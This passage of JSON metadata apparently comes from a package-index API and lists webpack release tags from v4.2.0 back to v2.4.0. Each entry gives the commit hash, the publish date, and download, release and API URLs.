T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/web